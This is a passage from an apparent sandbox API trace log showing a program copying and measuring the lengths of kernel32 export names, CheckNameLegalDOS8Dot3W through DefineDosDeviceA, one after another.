lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.282] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.282] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.282] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.282] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.282] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.282] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.282] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.282] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.282] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.282] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.283] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.283] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.283] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.283] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.283] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.283] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.283] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.283] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.283] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.283] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.283] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.283] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.283] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.283] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.283] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.283] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.283] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.283] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.283] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.284] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.284] lstrlenA (lpString="COPYFILEA") returned 9 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.284] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.284] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.284] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.284] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.284] lstrlenA (lpString="COPYFILEW") returned 9 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.284] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.284] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.284] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.284] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.284] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.284] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.284] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.284] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.284] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.284] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.285] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.285] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.285] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.285] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.285] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.285] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.285] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.285] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.285] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.285] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.285] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.285] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.285] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.285] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.285] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.285] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.286] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.286] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.286] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.286] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.286] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.286] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.286] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.286] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.286] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.286] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.286] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.286] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.286] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.286] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.286] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.286] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.286] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.286] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.287] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.287] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.287] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.287] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.287] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.287] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.287] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.287] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.287] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.287] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.287] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.287] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.287] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.287] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.287] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.287] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.287] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.288] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.288] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.288] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.288] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.288] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.288] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.288] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.288] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.288] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.288] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.288] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.288] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.288] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.288] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.288] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.288] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.288] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.288] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.288] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.289] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.289] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.289] lstrcpyA 